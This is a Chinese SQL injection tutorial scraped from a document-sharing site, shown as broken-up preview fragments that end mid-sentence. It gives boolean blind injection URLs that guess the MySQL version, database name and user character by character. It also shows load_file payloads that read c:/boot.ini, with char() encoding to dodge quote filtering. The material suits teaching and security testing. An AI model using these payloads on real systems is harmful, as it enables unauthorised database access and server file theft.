资源描述:
《mysql经典注射》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、标准实用Mysql经典注射前言:mysql4.0之前的版本不支持union语句,所以mysql4.0之前的版本的注射和其他版本的Mysql注射有很大的区别。Mysql4.0及其之后的版本的注射大多数是利用union联合查询来实现的,这种方法速度快,经典注射的方法在4.0及其版本的mysql也是可行的,但由于其方法复杂而不推荐使用。实现:当然首先要有一个注入点。发现内网http://192.168.0.1special_view.php存在注入漏洞。源代码如下:
2、fromspecialwhereid=".$id);if($row=mysql_fetch_array($result)){$id=$row[id];$title=$row[title];$date=$row["date"];$content=$row[content];Id没有过滤。因此http://192.168.0.1/special_view.php?id=16[sqlinjectionstatement]即可实现注入。1.猜解版本查询mysql版本的sql语句:SELECTversion();我们可以构造以下的url进行猜解:文案大全标准实用http://19
3、2.168.0.1/special_view.php?id=16%20and%20ascii(mid(version(),1,1))>96上面的url是猜版本号的第一位,我们用浏览器打开它时,myql数据库中执行了下面语句:select*fromspecialwhereid=16andascii(mid(version(),1,1))>96我们知道mysql的版本号的第一位是3,3的ascii码是51因此上面的语句为假,没有查询到任何结果。浏览器打开该url的结果如下:而http://192.168.0.1/special_view.php?id=16%20and%20
4、ascii(mid(version(),1,1))<96就不同了,在mysql数据库中执行下面的语句:select*fromspecialwhereid=16andascii(mid(version(),1,1))<96因为3的ascii码小于96所有上面的语句为真,执行的结果如下。因此浏览器就返回了正确的页面。文案大全标准实用同理,我们就可以猜解版本号的第2位,第3位。。。http://192.168.0.1/special_view.php?id=16%20and%20ascii(mid(version(),2,1))<96。。。2.猜解数据库名:查询数据库名是sq
5、l语句:SELECTdatabase()在浏览器中打开http://192.168.0.1/special_view.php?id=16%20and%20ascii(mid(database(),1,1))<96也就执行了下面的语句:select*fromspecialwhereid=16andascii(mid(database(),1,1))<96因为i的accii码文案大全标准实用105大于96,所以上面的语句为假,执行后查询不到任何结果。浏览器返回如下:在浏览器中打开http://192.168.0.1/special_view.php?id=16%20and%
6、20ascii(mid(database(),1,1))>96即在mysql数据库里执行:select*fromspecialwhereid=16andascii(mid(database(),1,1))>96因为i的accii码105大于96,所以上面的语句为真,myql数据库执行结果如下:在浏览器中打开结果如下:文案大全标准实用3.猜数据库用户原理和上面猜myql的版本和数据库名是一样的。只不过利用的函数是user()查询数据库用户名的sql语句:SELECTuser()构造http://192.168.0.1/special_view.php?id=16%20an
7、d%20ascii(mid(user(),1,1))>96等语句就可以实现对数据用户名的猜解,相当执行了下面语句:select*fromspecialwhereid=16andascii(mid(user(),1,1))>964.读文件读‘c:boot.ini’文件的sql语句:SELECTload_file(‘c:/boot.ini’)为了避开单引号,采取以下两种方式。文案大全标准实用SELECTload_file(char(99,58,92,98,111,111,116,46,105,110,105))或者SELECTload_fi
